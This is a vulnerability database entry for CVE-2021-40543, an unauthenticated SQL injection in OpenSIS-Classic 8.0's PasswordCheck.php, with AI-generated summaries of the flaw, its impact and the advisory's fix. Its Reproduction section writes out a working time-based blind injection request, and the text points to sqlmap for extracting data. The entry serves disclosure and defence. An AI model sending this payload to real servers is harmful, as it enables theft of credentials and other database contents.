CVE-2021-40543
Description
Opensis-Classic Version 8.0 is affected by a SQL injection vulnerability due to a lack of sanitization of input data at two parameters $_GET['usrid'] and $_GET['prof_id'] in the PasswordCheck.php file.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
OpenSIS-Classic 8.0 is vulnerable to unauthenticated SQL injection via the `usrid` and `prof_id` parameters in PasswordCheck.php, allowing database information disclosure.
Vulnerability
OpenSIS-Classic Version 8.0 contains a SQL injection vulnerability in the PasswordCheck.php file. The application fails to sanitize user-supplied input passed via the $_GET['usrid'] and $_GET['prof_id'] parameters, allowing an attacker to inject arbitrary SQL code into the query. The vulnerable code path is reachable without authentication. [1]
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP GET request to /PasswordCheck.php with a malicious payload in the usrid and prof_id parameters. For example, using a time-based blind SQL injection technique (SLEEP) to confirm the injection. Tools like sqlmap can automate the extraction of sensitive database content. No special privileges or user interaction are required. [1]
Impact
Successful exploitation allows an attacker to execute arbitrary SQL commands, leading to unauthorized access and disclosure of all information stored in the database, including user credentials and other sensitive data. The attacker can also potentially modify or delete data, depending on database permissions. The severity is high due to the lack of required authentication. [1]
Mitigation
The issue was reported via an advisory on the openSIS-Classic GitHub repository. The recommended fix is to use the sqlSecurityFilter() function from functions/SqlSecurityFnc.php to sanitize the input parameters. Specifically, the code should include include("functions/SqlSecurityFnc.php"); and then assign $usrid = sqlSecurityFilter($_GET['usrid']); while also using intval() on $_GET['prof_id']. No official patched version has been mentioned in the reference, but users can apply the suggested code changes as a workaround. [1]
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Opensis-Classic/Opensis-Classicdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on `$_GET['usrid']` and `$_GET['prof_id']` in PasswordCheck.php allows unauthenticated SQL injection."
Attack vector
An unauthenticated attacker can inject SQL code by appending malicious payloads to the `usrid` and `prof_id` query string parameters when accessing `PasswordCheck.php` [ref_id=1]. The advisory demonstrates a time-based blind SQL injection using `SLEEP(5)` in the `prof_id` parameter, which does not require any prior authentication [ref_id=1]. The attacker only needs network access to the web server hosting openSIS-Classic and can use tools like sqlmap to extract the entire database contents [ref_id=1].
Affected code
The vulnerability resides in `PasswordCheck.php`, where the `$_GET['usrid']` and `$_GET['prof_id']` parameters are used directly in SQL queries without sanitization [ref_id=1]. The advisory notes that the fix involves calling `sqlSecurityFilter()` from `functions/SqlSecurityFnc.php` on `$_GET['usrid']` and using `intval()` on `$_GET['prof_id']` [ref_id=1].
What the fix does
The advisory recommends applying the `sqlSecurityFilter()` function (from `functions/SqlSecurityFnc.php`) to sanitize the `$_GET['usrid']` input and wrapping `$_GET['prof_id']` with `intval()` to cast it to an integer, which neutralizes any injected SQL [ref_id=1]. No official patch commit is provided in the bundle; the fix is described only in the advisory's solution section [ref_id=1].
Preconditions
- authNo authentication required
- networkNetwork access to the openSIS-Classic web server
- networkThe PasswordCheck.php endpoint must be reachable
Reproduction
Access `PasswordCheck.php` with crafted parameters, e.g.: `GET /PasswordCheck.php?password=P@a&usrid=1&prof_id=1%27%20AND%20(SELECT%209714%20FROM%20(SELECT(SLEEP(5)))vGYX)--%20-` [ref_id=1]. The advisory confirms the server responds with a 200 OK and a body of `0`, indicating the injected SQL executed [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- github.com/OS4ED/openSIS-Classic/issues/191mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.